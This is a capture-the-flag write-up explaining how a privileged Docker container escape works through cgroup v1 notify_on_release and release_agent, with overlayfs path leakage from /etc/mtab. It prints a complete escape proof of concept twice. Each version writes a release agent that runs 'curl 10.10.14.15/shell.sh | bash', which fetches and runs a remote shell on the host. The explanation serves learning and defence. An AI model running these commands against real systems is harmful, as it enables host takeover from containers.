Digging into cgroups Escape
The method I used in Ready to get code execution on the host from a privileged Docker container was a series of bash commands that didn’t make much sense at first glance. I wanted to dive into them and see what was happening under the hood.
The privileged Docker container escape POC I used looked like this:
root@gitlab:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@gitlab:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@gitlab:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@gitlab:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.15/shell.sh | bash' >/c;
root@gitlab:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";
To explain how this works, I’ll use a slightly different version of the POC (from the same article) because it’s a bit easier to follow:
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "curl 10.10.14.15/shell.sh | bash" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
Both POCs take the same steps:
- Find or create access to the RDMA cgroup controller.
- Create a new cgroup within that controller.
- Enable notify_on_release for that cgroup, and set the release agent to a file accessible from both the container and the host.
- Start a quickly completing process within that cgroup that triggers execution of the release agent on termination.
The first thing to understand is the idea of cgroups. It’s a Linux kernel feature that limits and accounts for CPU (and other resource) usage for the collection of processes within a cgroup. Julia Evans has a zine describing cgroups:
cgroups are not exclusive to Docker, but they are used by Docker. This neat Medium post on Docker Internals goes into a lot more detail about how Docker uses cgroups for resource allocation.
The other concept that comes into play here is overlayfs, a “union mount filesystem” implementation in Linux. In overlayfs, there are two directories, upper and lower, that are merged to create another directory that represents the combination of the two. Julia Evans has another really helpful zine for overlayfs (she’s such a good resource!):
Julia has a post that goes into more detail with examples as well. The idea is that you can mount two file paths such that they create a third merged result. For example, the lower might be a container base image, and the upper might be changes made inside the container. In the merged result, if the file exists in both upper and lower, it shows the one from upper. If it doesn’t exist in upper, it shows the one from lower.
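The lookup rule is easy to model without mounting anything. The sketch below is not overlayfs itself; it only mimics the read side with two ordinary directories and ignores details such as deleted files. The function name merged_cat and the temp directories are made up for illustration.

```shell
#!/bin/sh
# Model of the overlayfs read rule using plain directories (no real mount).
# merged_cat and the directory names are hypothetical, for illustration only.
lower=$(mktemp -d)   # stands in for the image layers
upper=$(mktemp -d)   # stands in for the container's writable layer

echo "from image"     > "$lower/motd"
echo "only in image"  > "$lower/base.txt"
echo "from container" > "$upper/motd"

# Print a file the way the merged view would: upper wins, else fall back to lower.
merged_cat() {
    if [ -e "$upper/$1" ]; then
        cat "$upper/$1"
    elif [ -e "$lower/$1" ]; then
        cat "$lower/$1"
    else
        echo "merged_cat: $1: no such file" >&2
        return 1
    fi
}

merged_cat motd       # present in both, so the upper copy is shown
merged_cat base.txt   # only in lower, so the lower copy is shown
```

Anything written inside the container lands in the upper directory, which is why that path matters for the escape.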
What’s important to know here is that by leaking the host’s filepath to the upper directory used for the docker container, I can write something in the container, and know where it will be on the host.
Find / Create cgroup Controller
The first two commands (of three) in the first line of the POC create a directory and mount the RDMA cgroup controller on it (mount -t cgroup -o rdma):
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
It uses the RDMA cgroup, but others would work as well (there’s a list in the cgroups man page). In the Trail of Bits post they show an error that comes up when there is no RDMA cgroup, and suggest just changing rdma to memory to continue in another cgroup.
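To see which controllers a kernel offers before picking one, /proc/cgroups lists them along with an enabled flag. Here is a small sketch, assuming the usual four-column layout of that file (name, hierarchy ID, cgroup count, enabled). The helper name and the sample values are mine, not from the POC.

```shell
#!/bin/sh
# Print the names of enabled cgroup controllers from a /proc/cgroups-style file.
# enabled_controllers is a hypothetical helper; column 4 is the "enabled" flag.
enabled_controllers() {
    awk '!/^#/ && $4 == 1 { print $1 }' "$1"
}

# Sample data in the /proc/cgroups layout (values invented for the example).
sample=$(mktemp)
cat > "$sample" <<'EOF'
#subsys_name hierarchy num_cgroups enabled
cpu 3 64 1
memory 9 120 1
rdma 5 1 1
hugetlb 0 1 0
EOF

enabled_controllers "$sample"
# On a real system: enabled_controllers /proc/cgroups
```

Enabled only means the kernel supports the controller; whether it can be mounted as a v1 hierarchy from inside the container still depends on how the host is set up.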
The original POC finds an existing mount of the rdma cgroup controller using a somewhat obfuscated ls with wildcards:
root@gitlab:~# dirname $(ls -x /s*/fs/c*/*/r* |head -n1)
/sys/fs/cgroup/rdma
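To make the wildcards less mysterious, this sketch rebuilds a tiny fake /sys/fs/cgroup layout in a temp directory and runs the same pattern against it. The tree is invented; I’m assuming that, as on Ready, only the rdma directory has a file starting with r (release_agent) visible at its top level.

```shell
#!/bin/sh
# Recreate a tiny, fake /sys/fs/cgroup layout to watch the glob expand.
# The tree below is invented; only rdma exposes release_agent at its top level.
root=$(mktemp -d)
mkdir -p "$root/sys/fs/cgroup/rdma" "$root/sys/fs/cgroup/memory"
touch "$root/sys/fs/cgroup/rdma/release_agent"
touch "$root/sys/fs/cgroup/memory/memory.limit_in_bytes"

# Same pattern as the POC, just rooted in the fake tree:
#   s* -> sys, c* -> cgroup, * -> any controller, r* -> release_agent
match=$(ls -x "$root"/s*/fs/c*/*/r* | head -n1)
found=$(dirname "$match")

echo "${found#"$root"}"   # strip the temp prefix for display
```

If several controllers matched, the POC would simply take whatever ls prints on its first line, so the result depends on what the container can see.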
cgroup controllers are global resources, so mounting one again inside the container gives access to the same controller the host uses. Changes made here will be reflected in the host’s RDMA controller. Without being privileged, a container won’t have access to this.
Create New cgroup
Next, each POC creates a cgroup (directory) in that mount (x in this POC, w in the original POC):
mkdir -p $d/w;
Just creating the directory causes several files to appear in it:
root@gitlab:~# ls /tmp/cgrp/x/
cgroup.clone_children  notify_on_release  rdma.max
cgroup.procs           rdma.current       tasks
The next command writes a 1 to notify_on_release, which enables cgroup notifications on release:
If the notify_on_release flag is enabled (1) in a cgroup, then whenever the last task in the cgroup leaves (exits or attaches to some other cgroup) and the last child cgroup of that cgroup is removed, then the kernel runs the command specified by the contents of the "release_agent" file in that hierarchy's root directory, supplying the pathname (relative to the mount point of the cgroup file system) of the abandoned cgroup.
In each POC:
echo 1 > /tmp/cgrp/x/notify_on_release
echo 1 >$d/w/notify_on_release
The majority of the remaining commands are dedicated to setting the release agent. This is what will get run on the release notification. First, the POC needs to find the mapping so that the host can reference a file written in the container.
/etc/mtab has a list of all the mount points for the system, including the overlayfs mount:
root@gitlab:~# grep upper /etc/mtab
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/GIXQ4D2FJ63I5OGALTCGDBK6KT:/var/lib/docker/overlay2/l/PZB5MARGIAOF6N5AAJNTVUFS52:/var/lib/docker/overlay2/l/4KSUGTOLFYSBJFJQH2NUGVL54R:/var/lib/docker/overlay2/l/PJ4IKL6MDRM2ZSGFRAXCVHVLUR:/var/lib/docker/overlay2/l/XLLFVBBMKEEE672BOIVTSZ5XQZ:/var/lib/docker/overlay2/l/33JTQXWWPTNINADNR6R3YM47KY:/var/lib/docker/overlay2/l/XG5BUSKVZNINSBJD2J7MMLU5A3:/var/lib/docker/overlay2/l/ZI5Y7RO6WUTDK3DQVTUTOA2ZWI:/var/lib/docker/overlay2/l/SRZJCUXAPFOW35HRDPW7OHQWXN:/var/lib/docker/overlay2/l/SLR2WWC4VRYMZRPZ6EHZQSLNYS:/var/lib/docker/overlay2/l/SJBEI24D42KKTO5Z54GMKQPPXO,upperdir=/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff,workdir=/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/work,xino=off 0 0
The next command in the POC uses sed to get just the string that is the upperdir:
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
Running that shows where on the host filesystem the container files are:
root@gitlab:~# sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab
/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff
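The sed expression is dense, so here it is run against a hand-shortened sample line with each piece annotated. The layer IDs are placeholders, not real Docker paths. The POC’s shorter \perdir= appears to rely on sed treating \p as a plain p; I spell the key out as upperdir= here to avoid depending on that.

```shell
#!/bin/sh
# Extract upperdir from an overlay mount entry (sample line shortened by hand).
# The layer IDs below are placeholders, not real Docker paths.
mtab_line='overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAAA:/var/lib/docker/overlay2/l/BBBB,upperdir=/var/lib/docker/overlay2/abc123/diff,workdir=/var/lib/docker/overlay2/abc123/work,xino=off 0 0'

# .*upperdir=   skip everything up to the key
# \([^,]*\)     capture up to the next comma (the path itself)
# .*            swallow the rest; \1 keeps only the capture, p prints it
upper=$(printf '%s\n' "$mtab_line" | sed -n 's/.*upperdir=\([^,]*\).*/\1/p')

echo "$upper"
```

Because of -n and the trailing p flag, lines without an upperdir= entry print nothing, which is why the POC can feed it all of /etc/mtab.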
As an experiment, I’ll create a file in the root home dir on the container:
root@gitlab:~# echo "0xdf was here" > 0xdf
With an SSH shell as root on the host, I can see that file shows up in the upperdir:
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff# ls
bin etc home opt root root_pass run tmp usr var
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff# cd root/
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff/root# ls
0xdf
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff/root# cat 0xdf
0xdf was here
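Put another way, the host path is just the leaked upperdir with the container path appended. A minimal sketch of that mapping, where to_host_path is a hypothetical helper name and the rule is only assumed to hold for files on the container’s root overlay (not volumes or other mounts):

```shell
#!/bin/sh
# Map a path as seen inside the container to where it lands on the host.
# to_host_path is a hypothetical helper; upper is the value leaked from /etc/mtab.
upper=/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff

to_host_path() {
    # Files created in the container live under upperdir at the same relative path.
    printf '%s%s\n' "$upper" "$1"
}

to_host_path /root/0xdf
to_host_path /cmd
```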
This helps because now I can write the release agent script (a simple reverse shell) in the container, and then have the host call it. That’s what the next few commands do. Set the file, from the host’s perspective, as the release_agent:
echo "$host_path/cmd" > /tmp/cgrp/release_agent
Write the reverse shell from within the container:
echo '#!/bin/sh' > /cmd
echo "curl 10.10.14.15/shell.sh | bash" >> /cmd
chmod a+x /cmd
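When experimenting, it can help to swap the reverse shell for something harmless first. The sketch below builds a stand-in agent that only records the argument it receives, which per the documentation quoted earlier would be the path of the abandoned cgroup. All paths are temporary and invented, and the script is invoked by hand here rather than by the kernel.

```shell
#!/bin/sh
# Harmless stand-in for the release agent: it only records how it was called.
# All paths here are temporary and invented for the example.
workdir=$(mktemp -d)
agent="$workdir/cmd"

# %s is filled in now; "$1" stays literal and is expanded when the agent runs.
printf '#!/bin/sh\necho "released: $1" > "%s/out"\n' "$workdir" > "$agent"
chmod a+x "$agent"

# The kernel would pass the abandoned cgroup's path as the first argument.
# Invoke via sh so the demo also works where the temp dir is mounted noexec.
sh "$agent" /x
cat "$workdir/out"
```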
Now everything is set up so that when the last process in this new cgroup exits, the host will execute the reverse shell. All I need to do now is start a process within that cgroup and then let it finish. The POC makes use of a neat trick to do that. It starts a short-lived sh process, and has that process write its own PID into the cgroup.procs file of the x cgroup:
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
The $$ is escaped so that it expands inside the child sh rather than in my interactive shell. Unescaped, it would move my own shell into the cgroup, and nothing would fire until that shell exited. Writing the PID moves the sh process into the x cgroup, and sh exits as soon as the echo completes. The kernel sees that the last process in the cgroup is gone, leaving cgroup.procs empty again, and because notify_on_release is set, it runs the release agent on the host.
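Which shell expands $$ is easy to check without touching any cgroup. This sketch just prints the PIDs and makes no other assumptions:

```shell
#!/bin/sh
# Show which shell expands $$ depending on quoting.
outer=$(sh -c "echo $$")      # $$ expanded by this shell before sh starts
inner=$(sh -c "echo \$\$")    # $$ reaches the child sh and expands there

echo "this shell: $$"
echo "unescaped:  $outer"
echo "escaped:    $inner"
```

The unescaped form prints the calling shell’s PID, while the escaped form prints the PID of the short-lived child, which is the one that needs to land in cgroup.procs. The original POC sidesteps the quoting question by writing 0, which the cgroup v1 documentation describes as shorthand for the writing task itself.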